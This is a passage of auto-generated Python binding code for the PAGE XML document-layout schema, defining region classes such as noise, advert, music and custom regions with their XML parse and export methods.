if value is not None and 'colSpan' not in already_processed:
already_processed.add('colSpan')
self.colSpan = self.gds_parse_integer(value, node, 'colSpan')
value = find_attr_value_('header', node)
if value is not None and 'header' not in already_processed:
already_processed.add('header')
if value in ('true', '1'):
self.header = True
elif value in ('false', '0'):
self.header = False
else:
raise_parse_error(node, 'Bad boolean attribute')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class TableCellRoleType
class RolesType(GeneratedsSuper):
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('TableCellRole', 'TableCellRoleType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'TableCellRole', 'type': 'TableCellRoleType'}, None),
]
subclass = None
superclass = None
def __init__(self, TableCellRole=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.TableCellRole = TableCellRole
self.TableCellRole_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, RolesType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if RolesType.subclass:
return RolesType.subclass(*args_, **kwargs_)
else:
return RolesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_TableCellRole(self):
return self.TableCellRole
def set_TableCellRole(self, TableCellRole):
self.TableCellRole = TableCellRole
def hasContent_(self):
if (
self.TableCellRole is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RolesType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('RolesType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'RolesType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RolesType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RolesType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RolesType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RolesType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.TableCellRole is not None:
namespaceprefix_ = self.TableCellRole_nsprefix_ + ':' if (UseCapturedNS_ and self.TableCellRole_nsprefix_) else ''
self.TableCellRole.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TableCellRole', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'TableCellRole':
obj_ = TableCellRoleType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TableCellRole = obj_
obj_.original_tagname_ = 'TableCellRole'
# end class RolesType
class CustomRegionType(RegionType):
"""Regions containing content that is not covered
by the default types (text, graphic, image,
line drawing, chart, table, separator, maths,
map, music, chem, advert, noise, unknown).
Information on the type of content represented by this region"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('type_', 'string', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, type_=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("CustomRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, CustomRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if CustomRegionType.subclass:
return CustomRegionType.subclass(*args_, **kwargs_)
else:
return CustomRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def hasContent_(self):
if (
super(CustomRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='CustomRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('CustomRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'CustomRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='CustomRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='CustomRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='CustomRegionType'):
super(CustomRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='CustomRegionType')
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='CustomRegionType', fromsubclass_=False, pretty_print=True):
super(CustomRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
super(CustomRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(CustomRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class CustomRegionType
class UnknownRegionType(RegionType):
"""To be used if the region type cannot be ascertained."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("UnknownRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, UnknownRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if UnknownRegionType.subclass:
return UnknownRegionType.subclass(*args_, **kwargs_)
else:
return UnknownRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def hasContent_(self):
if (
super(UnknownRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnknownRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('UnknownRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'UnknownRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UnknownRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='UnknownRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='UnknownRegionType'):
super(UnknownRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UnknownRegionType')
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnknownRegionType', fromsubclass_=False, pretty_print=True):
super(UnknownRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(UnknownRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(UnknownRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class UnknownRegionType
class NoiseRegionType(RegionType):
"""Noise regions are regions where no real data lies, only
false data created by artifacts on the document or
scanner noise."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("NoiseRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, NoiseRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if NoiseRegionType.subclass:
return NoiseRegionType.subclass(*args_, **kwargs_)
else:
return NoiseRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def hasContent_(self):
if (
super(NoiseRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='NoiseRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('NoiseRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'NoiseRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='NoiseRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='NoiseRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='NoiseRegionType'):
super(NoiseRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='NoiseRegionType')
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='NoiseRegionType', fromsubclass_=False, pretty_print=True):
super(NoiseRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(NoiseRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(NoiseRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class NoiseRegionType
class AdvertRegionType(RegionType):
"""Regions containing advertisements.
The angle the rectangle encapsulating a region
has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
Range: -179.999,180
The background colour of the region"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, bgColour=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("AdvertRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.bgColour = _cast(None, bgColour)
self.bgColour_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, AdvertRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if AdvertRegionType.subclass:
return AdvertRegionType.subclass(*args_, **kwargs_)
else:
return AdvertRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_bgColour(self):
return self.bgColour
def set_bgColour(self, bgColour):
self.bgColour = bgColour
def validate_ColourSimpleType(self, value):
# Validate type pc:ColourSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
super(AdvertRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='AdvertRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('AdvertRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'AdvertRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='AdvertRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='AdvertRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='AdvertRegionType'):
super(AdvertRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='AdvertRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.bgColour is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='AdvertRegionType', fromsubclass_=False, pretty_print=True):
super(AdvertRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('bgColour', node)
if value is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
self.bgColour = value
self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
super(AdvertRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(AdvertRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class AdvertRegionType
class MusicRegionType(RegionType):
"""Regions containing musical notations.
The angle the rectangle encapsulating a region
has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
Range: -179.999,180
The background colour of the region"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, bgColour=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("MusicRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.bgColour = _cast(None, bgColour)
self.bgColour_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, MusicRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if MusicRegionType.subclass:
return MusicRegionType.subclass(*args_, **kwargs_)
else:
return MusicRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_bgColour(self):
return self.bgColour
def set_bgColour(self, bgColour):
self.bgColour = bgColour
def validate_ColourSimpleType(self, value):
# Validate type pc:ColourSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
super(MusicRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MusicRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('MusicRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'MusicRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MusicRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='MusicRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='MusicRegionType'):
super(MusicRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MusicRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.bgColour is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MusicRegionType', fromsubclass_=False, pretty_print=True):
super(MusicRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('bgColour', node)
if value is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
self.bgColour = value
self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
super(MusicRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(MusicRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class MusicRegionType
class MapRegionType(RegionType):
"""Regions containing maps.
The angle the rectangle encapsulating a
region has to be rotated in clockwise
direction in order to correct the present
skew (negative values indicate
anti-clockwise rotation). Range:
-179.999,180"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
